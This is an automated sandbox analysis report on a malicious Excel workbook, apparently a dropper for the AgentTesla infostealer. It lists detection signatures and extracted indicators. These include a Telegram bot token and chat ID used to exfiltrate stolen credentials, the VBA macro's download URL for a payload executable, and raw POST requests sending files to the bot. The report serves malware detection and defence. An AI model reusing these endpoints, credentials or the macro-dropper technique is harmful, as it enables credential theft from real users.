Windows Analysis Report
00001.LPCD2022.xls

Overview

General Information

Sample Name: 00001.LPCD2022.xls
Analysis ID: 605526
MD5: eccc1d5afe2f72a48203944b1abf01a3
SHA1: 32597a76c5e04fa67b6199bc9817ebdb9e1b7f71
SHA256: 6122dce9933f03479b3d98aea0785ae26737644262ac9ee8a67cbfbf11050f13
Tags: xls
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Yara detected AgentTesla
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Tries to steal Mail credentials (via file / registry access)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Creates processes via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Document contains an embedded VBA macro which may execute processes
Office process drops PE file
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for dropped file
Document contains an embedded VBA with hexadecimal encoded strings
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document contains an embedded VBA macro which executes code when the document is opened / closed
Yara detected Credential Stealer
Sigma detected: Excel Network Connections
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)
Sigma detected: Autorun Keys Modification

Classification

AV Detection
barindex
Found malware configuration
Source: 3.2.RegSvcs.exe.400000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5019146869", "Chat URL": "https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument"}
Source: dropped.exe.1980.2.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendMessage"}
Multi AV Scanner detection for submitted file
Source: 00001.LPCD2022.xls Virustotal: Detection: 60% Perma Link
Source: 00001.LPCD2022.xls ReversingLabs: Detection: 60%
Antivirus / Scanner detection for submitted sample
Source: 00001.LPCD2022.xls Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\dropped.exe ReversingLabs: Detection: 57%
Machine Learning detection for sample
Source: 00001.LPCD2022.xls Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.0.RegSvcs.exe.400000.4.unpack Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.3.unpack Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.2.unpack Avira: Label: TR/Spy.Gen8
Source: 3.0.RegSvcs.exe.400000.1.unpack Avira: Label: TR/Spy.Gen8
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: Binary string: RegSvcs.pdb source: BINGO.exe, BINGO.exe, 00000006.00000000.959068378.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe, 00000006.00000002.961292531.0000000000E02000.00000020.00000001.01000000.00000008.sdmp, BINGO.exe.3.dr

Software Vulnerabilities
barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: dropped.exe.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\dropped.exe Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:443
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: transfer.sh
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:443

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195bfbe5defbHost: api.telegram.orgContent-Length: 1036Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195d3e2a38cbHost: api.telegram.orgContent-Length: 5245Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195f7a6800deHost: api.telegram.orgContent-Length: 945Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195fc1ea40beHost: api.telegram.orgContent-Length: 108279Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da196245dad951Host: api.telegram.orgContent-Length: 112430Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da19651155316aHost: api.telegram.orgContent-Length: 112590Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da1967dccd5f5cHost: api.telegram.orgContent-Length: 112590Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da196aa84ed922Host: api.telegram.orgContent-Length: 112587Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da196f7fa188b0Host: api.telegram.orgContent-Length: 112587Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da19703f385b46Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da19730abb6823Host: api.telegram.orgContent-Length: 116890Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da1975d63c36dcHost: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da1978a1b83814Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da197b6d36fee5Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da197e38b4cb02Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da198104356572Host: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da1983cfbb680eHost: api.telegram.orgContent-Length: 116890Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da19869b38ef92Host: api.telegram.orgContent-Length: 116893Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da198966b6e37bHost: api.telegram.orgContent-Length: 116893Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da198c3235a9deHost: api.telegram.orgContent-Length: 116893Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da198efdb17ad0Host: api.telegram.orgContent-Length: 116893Expect: 100-continueConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49171 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Uv5XFY/0000.LPCD2022.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: transfer.sh
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox View IP Address: 144.76.136.153 144.76.136.153
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://GCHNJv.com
Source: RegSvcs.exe, 00000003.00000002.1171424229.000000000251B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://Kcwgjt6COc07kGTRi1sQ.net
Source: RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.1171298576.00000000007E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%appdata
Source: RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: dropped.exe, 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocumentdocument-----
Source: RegSvcs.exe, 00000003.00000002.1171520335.000000000259A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.orgP
Source: RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: transfer.sh
Source: global traffic HTTP traffic detected: GET /Uv5XFY/0000.LPCD2022.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: transfer.sh
Source: unknown Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown HTTP traffic detected: POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da195bfbe5defbHost: api.telegram.orgContent-Length: 1036Expect: 100-continueConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Source: 00001.LPCD2022.xls Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, API IServerXMLHTTPRequest2.Open("GET","https://transfer.sh/Uv5XFY/0000.LPCD2022.exe",False) Name: cjpojbxatghyew
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, API Stream.Open() Name: cjpojbxatghyew
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, API Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdDc0?\x08?\x00\x00\x00?\x08 \x00?\x08\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x08?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x08K\x00?\x08?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x08 \x00?\x08?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x08?\x00?\x08\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x08\x00\x00H\x00\x02\x05?\x00?\x00\x03\x00O??\x01?\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?Z\x00??\x01\x00??\x01???\xfffd??\x00???\x02?8\x00?\x00??\x00??\x01\x00??\x03???\xfffd??\x00???\x04?8\x00?\x00?\x03p\x00\x01??\x00?\x00\x00?\x10? \x00??\x00??\x00????\x00N\x00?\x00?*\x00??\x06??\x00\x00??\x00???????\x00???\x00^?\x00????\x02\x00????\x11??\x00???F???\x00?\x00\x00?\x00?\x04\xfffd\x00\x02?G\x00???\x00\x00?\x04?\x00?\x00?\x00?t\x00?\x00?\x1f\x00??\x10?\x13 \x00?\x13?????????\xfffd??\x05??\x07??\x00\x00\x00??\x11??\x12?"\x00????\x00\x00d??\x00?????\xfffd??\x01??\x03??\x00\x00\x00??\x11??\x14?"\x00???????\x04\xfffd\x00\x03??\x00???\x01\x00\x14\x00?\x00\x00^?\x00??\x1a\x00d??\x01??\x00\x00?\x00??\x00??\x00??\x14?"\x00??\x11?I\x00??\x00?#\x00\x00\x00???\x00\x00??\x00??\x12?"\x00??\x11??\x00??\x00?#\x00\x00\x00?? \x00\x00?\x00?o??e??*?\x05?\x00\x04??\x00?\x0c?\x01\x00s\x00?\x00\x00*^?\x00??*\x00??\x03??d???\x00 \x00\x00?\x00???????I\x00?????\x02???\xfffd??\x00?????\x08???\xfffd??\x00?????\x06???\xfffd?\x04\xfffd\x00\x05??\x00???\x01\x00t\x00?\x00\x00*??\x00???\x00?????\x05?d?\x06???\xfffd?\x03??\x01???#\x00\x00??\x138\x00??\x00??\x00???\x00\x00\x00???\x15\x00??\x03?\x11?\x04?????\x01?\x11?\x02? \x00?\x12??????\xfffd?\x04g\x00\x06??\x00?\x05\x008\x00??\x11d?\x00????d?\x00??\x07??\x05???\x00??????\x14???\x00?I\x00??\x18?\x13??\xfffd?\x03N\x00\x07??\x00???\x00\x00?\x02?\x00?\x00?\x01?\x00?\x01?\xfffd\x00??\x00??]\x00`?\x1c?\x13G\x00?\x13???? \x00?????\x00????d??\x00?\x00\x00\x00\x00???\x00?\x12?????????\x1d?#\x00\x00\x00???o\x00?\x00???????????\x1b????????\x00??\x1b?? \x00?\x13???? \x00?.?\x11??\x00??\x1b??\x16??????d???????????\x1c?e??\xfffd?\x05???\x00?\x05?*\x1e?\x02?>?\x00?\x01?\x00?.?\x00?\x00???\x00??\x01\x00??\x06???\xfffd??\x00???\x07?8\x00?\x00?\x045\x00\x08???\x00??\x00??\x19??\x19???\x00??\x00\x00?\x00?\x00\x00\x11*\x00?\x04J\x00\x00\x00Z\x00?\x00\x00?\x10?8\x00\x00??\xfffd??\xfffd??\x18??\x00\x00*??\x00\xfffd?\x00??\x00???\x00?\x045\x00\x08??\x00????\x00??\x00??\x19??\x19??\x138\x00?????\xfffd\x00?\x040\x00\x08???\x00??\x00??"??\x17??\x138\x00?\x05\x008\x00???\x08???\x00?\x08?*\x1e Name: cjpojbxatghyew
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function cjpojbxatghyew, found possibly 'ADODB.Stream' functions open, savetofile, write Name: cjpojbxatghyew
.NET source code contains very large array initializations
Source: 3.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Source: 3.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE06C67C6u002d90A7u002d4E02u002d867Au002d6F10B628DD48u007d/E359CAF0u002d1D35u002d4165u002d8E86u002dF04877A51E7E.cs Large array initialization: .cctor: array initializer size 11655
Document contains an embedded VBA macro which may execute processes
Source: 00001.LPCD2022.xls OLE, VBA macro line: Set zntkkzkmzqhln = jupwigkjmzusaimuh.SpawnInstance_
Source: VBA code instrumentation OLE, VBA macro: Module vzbprmttn, Function wdzlbznhf, API SWbemObjectEx.SpawnInstance_() Name: wdzlbznhf
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\dropped.exe Jump to dropped file
